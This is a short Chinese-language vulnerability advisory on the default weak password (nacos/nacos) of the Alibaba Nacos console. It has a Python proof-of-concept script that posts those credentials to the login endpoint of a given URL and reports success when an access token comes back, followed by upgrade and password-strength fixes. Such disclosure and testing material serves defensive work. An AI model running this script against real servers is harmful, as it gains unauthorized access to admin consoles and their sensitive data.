漏洞描述

Alibaba Nacos 控制台存在默认弱口令 nacos/nacos，可登录后台查看敏感信息

影响范围

Alibaba Nacos

漏洞复现

发送如下请求:

返回200说明成功登录

脚本复现
python3 poc.py https://nacos.taget.com/

#!usr/bin/env python
# *-* coding:utf-8 *-*
import requests
import json
import sys
import urllib3
urllib3.disable_warnings()
def poc(arg):
    vuln_url = arg + 'v1/auth/users/login'
    headers = {"User-Agent": "Nacos-Server",
               "Content-Type": "application/x-www-form-urlencoded"
               }
    postdata= "username=nacos&password=nacos"
    try:
        r = requests.post(vuln_url,headers=headers,verify=False,timeout=20,allow_redirects=False,data=postdata)
        if r.status_code == 200 and  "accessToken" in r.text:
            
                print('存在漏洞：'+vuln_url)

    except Exception as e:
        print('出错：'+str(e))
        pass
            
        
url=sys.argv[1]        
poc(url)

修复建议

1、升级最新版本： https://nacos.io/zh-cn/
2、口令8位数以上，包括大小写字符，特殊字母，数字